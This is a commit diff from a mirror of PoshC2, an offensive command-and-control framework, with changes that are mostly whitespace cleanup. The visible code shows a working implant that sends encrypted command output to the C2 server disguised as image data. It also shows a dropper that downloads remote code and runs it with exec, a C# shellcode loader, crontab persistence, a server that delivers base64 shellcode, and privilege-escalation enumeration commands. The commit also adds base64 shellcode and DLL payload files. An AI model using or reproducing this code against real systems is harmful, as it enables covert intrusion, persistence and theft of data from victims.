infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Pull out payloads from Payloads.py; Add base64 encoded binary payload files; Fix whitespace issues that were triggering.

temp
m0rv4i 2019-03-12 20:33:45 +00:00
parent 321469cc40
commit 31bf485ac7
33 changed files with 216 additions and 178 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
AutoLoads.py
View File

@ -4,7 +4,7 @@ from DB import update_mods, new_task, select_mods
from Config import ModulesDirectory
import os, base64
def check_module_loaded( module_name, randomuri, user, force=False ):
def check_module_loaded(module_name, randomuri, user, force=False):
try:
modules_loaded = select_mods(randomuri)
if force:

12
C2Server.py
View File

@ -84,7 +84,7 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
s.wfile.write(content)
elif ("%spotal" % QuickCommandURI) in s.path:
filename = "%sSharp-shellcode_x86.bin" % (PayloadsDirectory)
filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
@ -94,7 +94,7 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
s.wfile.write(content)
elif ("%slogin" % QuickCommandURI) in s.path:
filename = "%sSharp-shellcode_x64.bin" % (PayloadsDirectory)
filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
@ -403,7 +403,7 @@ if __name__ == '__main__':
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], HostnameIP, C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails( "updated_host", HostnameIP, C2[3], "", "", "", "" )
new_urldetails("updated_host", HostnameIP, C2[3], "", "", "", "")
update_item("HostnameIP", "C2Server", HostnameIP)
update_item("QuickCommand", "C2Server", QuickCommand)
newPayload.CreateRaw()
@ -416,7 +416,7 @@ if __name__ == '__main__':
newPayload.CreateEXE()
newPayload.CreateMsbuild()
newPayload.CreatePython()
newPayload.WriteQuickstart( ROOTDIR + 'quickstart.txt' )
newPayload.WriteQuickstart(ROOTDIR + 'quickstart.txt')
else:
print ("Initializing new project folder and database" + Colours.GREEN)
@ -451,7 +451,7 @@ if __name__ == '__main__':
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails( "default", C2[1], C2[3], "", "", "", "" )
new_urldetails("default", C2[1], C2[3], "", "", "", "")
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
@ -464,7 +464,7 @@ if __name__ == '__main__':
create_self_signed_cert(ROOTDIR)
newPayload.CreatePython()
newPayload.WriteQuickstart( directory + '/quickstart.txt' )
newPayload.WriteQuickstart(directory + '/quickstart.txt')
print ("")
print ("CONNECT URL: "+select_item("HostnameIP", "C2Server")+get_newimplanturl() + Colours.GREEN)

20
Core.py
View File

@ -38,24 +38,24 @@ def get_images():
return images
# Decrypt a string from base64 encoding
def get_encryption( key, iv='0123456789ABCDEF' ):
def get_encryption(key, iv='0123456789ABCDEF'):
from Crypto.Cipher import AES
iv = os.urandom(AES.block_size)
aes = AES.new( base64.b64decode(key), AES.MODE_CBC, iv )
aes = AES.new(base64.b64decode(key), AES.MODE_CBC, iv)
return aes
# Decrypt a string from base64 encoding
def decrypt( key, data ):
def decrypt(key, data):
iv = data[0:16]
aes = get_encryption(key, iv)
data = aes.decrypt( base64.b64decode(data) )
data = aes.decrypt(base64.b64decode(data))
return data[16:]
# Decrypt a string from base64 encoding
def decrypt_bytes_gzip( key, data):
def decrypt_bytes_gzip(key, data):
iv = data[0:16]
aes = get_encryption(key, iv)
data = aes.decrypt( data )
data = aes.decrypt(data)
import StringIO
import gzip
infile = StringIO.StringIO(data[16:])
@ -64,7 +64,7 @@ def decrypt_bytes_gzip( key, data):
return data
# Encrypt a string and base64 encode it
def encrypt( key, data, gzip=False ):
def encrypt(key, data, gzip=False):
if gzip:
print 'Gzipping data - pre-zipped len, ' + str(len(data))
import StringIO
@ -78,11 +78,11 @@ def encrypt( key, data, gzip=False ):
mod = len(data) % 16
if mod != 0:
newlen = len(data) + (16-mod)
data = data.ljust( newlen, '\0' )
data = data.ljust(newlen, '\0')
aes = get_encryption(key, os.urandom(16))
data = aes.IV + aes.encrypt( data )
data = aes.IV + aes.encrypt(data)
if not gzip:
data = base64.b64encode( data )
data = base64.b64encode(data)
return data
def filecomplete(text, state):

29
DB.py
View File

@ -54,8 +54,7 @@ def initializedb():
ProxyURL TEXT,
ProxyUsername TEXT,
ProxyPassword TEXT,
CredentialExpiry TEXT
);"""
CredentialExpiry TEXT);"""
create_creds = """CREATE TABLE Creds (
credsID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
@ -150,7 +149,7 @@ def get_newtasks_all():
else:
return None
def new_urldetails( RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry ):
def new_urldetails(RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry):
conn = sqlite3.connect(Database)
conn.text_factory = str
c = conn.cursor()
@ -164,7 +163,7 @@ def drop_newtasks():
c.execute("DELETE FROM NewTasks ")
conn.commit()
def new_task( task, user, randomuri ):
def new_task(task, user, randomuri):
conn = sqlite3.connect(Database)
conn.text_factory = str
c = conn.cursor()
@ -185,7 +184,7 @@ def get_lastcommand():
else:
return None
def new_commandhistory( command ):
def new_commandhistory(command):
conn = sqlite3.connect(Database)
conn.text_factory = str
c = conn.cursor()
@ -229,7 +228,7 @@ def get_implants():
else:
return None
def get_implanttype( randomuri ):
def get_implanttype(randomuri):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -240,7 +239,7 @@ def get_implanttype( randomuri ):
else:
return None
def get_implantdetails( randomuri ):
def get_implantdetails(randomuri):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -251,7 +250,7 @@ def get_implantdetails( randomuri ):
else:
return None
def get_hostdetails( implant_id ):
def get_hostdetails(implant_id):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -262,7 +261,7 @@ def get_hostdetails( implant_id ):
else:
return None
def get_randomuri( implant_id ):
def get_randomuri(implant_id):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -281,37 +280,37 @@ def add_autorun(Task):
c.execute("INSERT INTO AutoRuns (Task) VALUES (?)", (Task,))
conn.commit()
def update_sleep( sleep, randomuri ):
def update_sleep(sleep, randomuri):
conn = sqlite3.connect(Database)
c = conn.cursor()
c.execute("UPDATE Implants SET Sleep=? WHERE RandomURI=?",(sleep, randomuri))
conn.commit()
def update_label( label, randomuri ):
def update_label(label, randomuri):
conn = sqlite3.connect(Database)
c = conn.cursor()
c.execute("UPDATE Implants SET Label=? WHERE RandomURI=?",(label, randomuri))
conn.commit()
def update_mods( modules, randomuri ):
def update_mods(modules, randomuri):
conn = sqlite3.connect(Database)
c = conn.cursor()
c.execute("UPDATE Implants SET ModsLoaded=? WHERE RandomURI=?",(modules, randomuri))
conn.commit()
def kill_implant( randomuri ):
def kill_implant(randomuri):
conn = sqlite3.connect(Database)
c = conn.cursor()
c.execute("UPDATE Implants SET Alive='No' WHERE RandomURI=?",(randomuri,))
conn.commit()
def unhide_implant( randomuri ):
def unhide_implant(randomuri):
conn = sqlite3.connect(Database)
c = conn.cursor()
c.execute("UPDATE Implants SET Alive='Yes' WHERE RandomURI=?",(randomuri,))
conn.commit()
def select_mods( randomuri ):
def select_mods(randomuri):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()

8
Files/Implant-Core.py
View File

@ -78,10 +78,10 @@ def remove_persist():
s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True)
return "Removed user persistence via crontab: \\r\\n**must delete files manually**"
def decrypt_bytes_gzip( key, data):
def decrypt_bytes_gzip(key, data):
iv = data[0:16]
aes = get_encryption(key, iv)
data = aes.decrypt( data )
data = aes.decrypt(data)
import StringIO
import gzip
infile = StringIO.StringIO(data[16:])
@ -108,7 +108,7 @@ while(True):
#print html
if html:
try:
returncmd = decrypt( key, html )
returncmd = decrypt(key, html)
returncmd = returncmd.rstrip('\\0')
if "multicmd" in returncmd:
@ -213,7 +213,7 @@ while(True):
opener = urllib2.build_opener()
postcookie = encrypt(key, taskId)
data = base64.b64decode(random.choice(icoimage))
dataimage = data.ljust( 1500, '\x00' )
dataimage = data.ljust(1500, '\x00')
dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True))
if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie})
else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie})

4
Files/Posh.cs
View File

@ -73,13 +73,13 @@ public class Program
public class Bypass : ServicedComponent
{
[ComRegisterFunction]
public static void RegisterClass ( string key )
public static void RegisterClass (string key)
{
Program.Main();
}
[ComUnregisterFunction]
public static void UnRegisterClass ( string key )
public static void UnRegisterClass (string key)
{
Program.Main();
}

1
Files/Posh_v2_x64_Shellcode.b64 Normal file
View File

File diff suppressed because one or more lines are too long

1
Files/Posh_v2_x64_dll.b64 Normal file
View File

File diff suppressed because one or more lines are too long

1
Files/Posh_v2_x86_Shellcode.b64 Normal file
View File

File diff suppressed because one or more lines are too long

1
Files/Posh_v2_x86_dll.b64 Normal file
View File

File diff suppressed because one or more lines are too long

1
Files/Posh_v4_x64_Shellcode.b64 Normal file
View File

File diff suppressed because one or more lines are too long

1
Files/Posh_v4_x64_dll.b64 Normal file
View File

File diff suppressed because one or more lines are too long

1
Files/Posh_v4_x86_Shellcode.b64 Normal file
View File

File diff suppressed because one or more lines are too long

1
Files/Posh_v4_x86_dll.b64 Normal file
View File

File diff suppressed because one or more lines are too long

1
Files/Sharp_v4_x64_Shellcode.b64 Normal file
View File

File diff suppressed because one or more lines are too long

1
Files/Sharp_v4_x64_dll.b64 Normal file
View File

File diff suppressed because one or more lines are too long

1
Files/Sharp_v4_x86_Shellcode.b64 Normal file
View File

File diff suppressed because one or more lines are too long

1
Files/Sharp_v4_x86_dll.b64 Normal file
View File

File diff suppressed because one or more lines are too long

18
Files/aes.py
View File

@ -3,7 +3,7 @@
#REPLACEKEY#
def encrypt( key, data, gzip=False ):
def encrypt(key, data, gzip=False):
if gzip:
import StringIO
import gzip
@ -15,29 +15,29 @@ def encrypt( key, data, gzip=False ):
iv = os.urandom(16)
if mod != 0:
newlen = len(data) + (16-mod)
data = data.ljust( newlen, '\0' )
data = data.ljust(newlen, '\0')
aes = get_encryption(key, iv)
ct = ""
for i in xrange(0, len(data), 16):
ct += aes.encrypt( data[i:i+16] )
ct += aes.encrypt(data[i:i+16])
ct = iv + ct
data = ct
if not gzip:
data = base64.b64encode( data )
data = base64.b64encode(data)
return data
def get_encryption( key, iv ):
def get_encryption(key, iv):
aes = AESModeOfOperationCBC(base64.b64decode(key), iv = iv)
return aes
# Decrypt a string from base64 encoding
def decrypt( key, data ):
def decrypt(key, data):
data = base64.b64decode(data)
aes = get_encryption(key, data[0:16])
cipher = data[16:]
ct = ""
for i in xrange(0, len(cipher), 16):
ct += aes.decrypt( cipher[i:i+16] )
ct += aes.decrypt(cipher[i:i+16])
return ct
PADDING_NONE = 'none'
@ -412,7 +412,7 @@ class AES(object):
result.append((self.S[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.S[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.S[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.S[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
result.append((self.S[ t[(i + s3) % 4] & 0xFF] ^ tt) & 0xFF)
return result
@ -446,7 +446,7 @@ class AES(object):
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt) & 0xFF)
return result

2
Files/csc.cs
View File

@ -69,7 +69,7 @@ class Program
IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE);
if( mem != IntPtr.Zero )
if(mem != IntPtr.Zero)
{
uint oldProt = 0;
uint threadId = 0;

2
Files/dropper.py
View File

@ -16,7 +16,7 @@ res=urllib2.urlopen(r);d=res.read();c=d[1:];b=c.decode("hex")
s=hashlib.sha512(b)
if pykey in b and pyhash == s.hexdigest() and cstr < kd: exec(b)
else: sys.exit(0)
un=pwd.getpwuid( os.getuid() )[ 0 ];pid=os.getpid()
un=pwd.getpwuid(os.getuid())[ 0 ];pid=os.getpid()
is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86')
hn=socket.gethostname();o=urllib2.build_opener()
encsid=encrypt(key, '%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,serverclean))

20
HTML.py
View File

@ -70,7 +70,7 @@ def get_implants_all_db():
else:
return None
def get_htmlimplant( randomuri ):
def get_htmlimplant(randomuri):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -233,23 +233,23 @@ function tweakMarkup(){
//var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot']
tbl = document.getElementById("PoshTable");
ths = tbl.getElementsByTagName("th");
for( i=0; i<ths.length; i++ ){
for(i=0; i<ths.length; i++){
th = ths[i];
th.className = classes[i]
}
trs = tbl.getElementsByTagName("tr");
for( i=0; i<trs.length; i++ ){
for(i=0; i<trs.length; i++){
tr = trs[i]
tds = tr.getElementsByTagName('td');
if( i % 2 == 0 ){
if(i % 2 == 0){
tr.className = 'even';
}else{
tr.className = 'odd';
}
for( j=0; j<tds.length; j++ ){
for(j=0; j<tds.length; j++){
td = tds[j];
td.className = classes[j]
if( td.className.match(/output|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|id|Label|taskid|randomuri|command|output|User|ImplantID|RandomURI|User|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot/) ){
if(td.className.match(/output|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|id|Label|taskid|randomuri|command|output|User|ImplantID|RandomURI|User|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot/)){
td.className += ' hidden';
td.innerHTML = '<div>' + td.innerHTML + '</div>';
td.onclick = toggleHide
@ -259,13 +259,13 @@ function tweakMarkup(){
}
function toggleHide( evnt ){
function toggleHide(evnt){
td = evnt.target;
if( td.nodeName == 'DIV' ){
if(td.nodeName == 'DIV'){
td = td.parentElement;
}
cls = td.className;
if( cls.match(/hidden/) ){
if(cls.match(/hidden/)){
cls = cls.replace('hidden','shown');
}else{
cls = cls.replace('shown','hidden');
@ -368,7 +368,7 @@ font-size: 12px;
__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \\
| | ( <_>)___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
================== www.PoshC2.co.uk ===============

2
Help.py
View File

@ -4,7 +4,7 @@ logopic = r"""
__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \\
| | ( <_>)___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
=============== v4.8 www.PoshC2.co.uk =============

12
ImplantHandler.py
View File

@ -74,7 +74,7 @@ def createproxypayload(user, startup):
newPayload.CreateShellcode("Proxy")
newPayload.CreateEXE("Proxy")
newPayload.CreateMsbuild("Proxy")
new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire )
new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire)
startup(user, "Created new proxy payloads")
def createdaisypayload(user, startup):
@ -95,7 +95,7 @@ def createdaisypayload(user, startup):
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" )
new_urldetails(name, C2[1], C2[3], domain, daisyurl, daisyhostid, "")
startup(user, "Created new %s daisy payloads" % name)
def createnewpayload(user, startup):
@ -127,7 +127,7 @@ def createnewpayload(user, startup):
newPayload.CreateEXE("%s_" % domainbase)
newPayload.CreateMsbuild("%s_" % domainbase)
newPayload.CreatePython("%s_" % domainbase)
new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire )
new_urldetails(randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
startup(user, "Created new payloads")
def complete(text, state):
@ -353,11 +353,11 @@ def startup(user, printhelp = ""):
if "creds" in implant_id.lower():
startup(user, "creds module not implemented yet")
if (implant_id.lower() == "pwnself" ) or (implant_id.lower() == "p"):
if (implant_id.lower() == "pwnself") or (implant_id.lower() == "p"):
subprocess.Popen(["python", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
startup(user)
if (implant_id.lower() == "tasks" ) or (implant_id.lower() == "tasks "):
if (implant_id.lower() == "tasks") or (implant_id.lower() == "tasks "):
alltasks = ""
tasks = get_newtasks_all()
if tasks is None:
@ -368,7 +368,7 @@ def startup(user, printhelp = ""):
alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
startup(user, "Queued tasks:\r\n\r\n%s" % alltasks)
if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
if (implant_id.lower() == "cleartasks") or (implant_id.lower() == "cleartasks "):
drop_newtasks()
startup(user, "Empty tasks queue\r\n")

4
Install.sh
View File

@ -5,7 +5,7 @@ echo ""
echo """ __________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \\
| | ( <_>)___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
================= www.PoshC2.co.uk ================"""
@ -63,7 +63,7 @@ echo ""
echo """ __________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \\
| | ( <_>)___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
================= www.PoshC2.co.uk ================"""

8
Modules/linuxprivchecker.py
View File

@ -138,10 +138,10 @@ if "root" in userInfo["ID"]["results"][0]:
# File/Directory Privs
print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
fdPerms = {"WWDIRSROOT":{"cmd":"find / \(-wholename '/home/homedir*' -prune \) -o \(-type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \(-wholename '/home/homedir*' -prune \) -o \(-type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \(-wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \(-type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \(-perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
"ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
}

20
OfflineReportGenerator.py
View File

@ -65,7 +65,7 @@ def get_implants_all_db():
else:
return None
def get_htmlimplant( randomuri ):
def get_htmlimplant(randomuri):
conn = sqlite3.connect(DB)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -207,23 +207,23 @@ function tweakMarkup(){
var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot']
tbl = document.getElementById("PoshTable");
ths = tbl.getElementsByTagName("th");
for( i=0; i<ths.length; i++ ){
for(i=0; i<ths.length; i++){
th = ths[i];
th.className = classes[i]
}
trs = tbl.getElementsByTagName("tr");
for( i=0; i<trs.length; i++ ){
for(i=0; i<trs.length; i++){
tr = trs[i]
tds = tr.getElementsByTagName('td');
if( i % 2 == 0 ){
if(i % 2 == 0){
tr.className = 'even';
}else{
tr.className = 'odd';
}
for( j=0; j<tds.length; j++ ){
for(j=0; j<tds.length; j++){
td = tds[j];
td.className = classes[j]
if( td.className.match(/output|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|id|taskid|randomuri|command|output|user|ImplantID|RandomURI|User|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|Label/) ){
if(td.className.match(/output|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|id|taskid|randomuri|command|output|user|ImplantID|RandomURI|User|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|Label/)){
td.className += ' hidden';
td.innerHTML = '<div>' + td.innerHTML + '</div>';
td.onclick = toggleHide
@ -233,13 +233,13 @@ function tweakMarkup(){
}
function toggleHide( evnt ){
function toggleHide(evnt){
td = evnt.target;
if( td.nodeName == 'DIV' ){
if(td.nodeName == 'DIV'){
td = td.parentElement;
}
cls = td.className;
if( cls.match(/hidden/) ){
if(cls.match(/hidden/)){
cls = cls.replace('hidden','shown');
}else{
cls = cls.replace('shown','hidden');
@ -342,7 +342,7 @@ font-size: 12px;
__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \
| | ( <_>)___ \| Y \ \ \____/ \
|____| \____/____ >___| / \______ /\_______
\/ \/ \/ \/
================= www.PoshC2.co.uk ===============

2
PSHandler.py
View File

@ -353,7 +353,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
else:
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
print ("Error with source file: %s" % e)
traceback.print_exc()
elif "kill-implant" in command.lower() or "exit" in command.lower():

209
Payloads.py
View File

File diff suppressed because one or more lines are too long

2
PyHandler.py
View File

@ -77,7 +77,7 @@ def handle_py_command(command, user, randomuri, startup):
else:
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
print ("Error with source file: %s" % e)
traceback.print_exc()
elif command.lower() == "help" or command == "?" or command.lower() == "help ":

2
SharpHandler.py
View File

@ -55,7 +55,7 @@ def handle_sharp_command(command, user, randomuri, startup):
else:
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
print ("Error with source file: %s" % e)
traceback.print_exc()
elif "unhide-implant" in command.lower():

2
Update.sh
View File

@ -6,7 +6,7 @@ echo ""
echo """__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \
| | ( <_>)___ \| Y \ \ \____/ \
|____| \____/____ >___| / \______ /\_______ \
\/ \/ \/ \/
================= www.PoshC2.co.uk ================="""

2
Utils.py
View File

@ -52,7 +52,7 @@ def argp(cmd):
pass
return args
def load_file( location ):
def load_file(location):
fr = None
try:
file = open((location), "rb")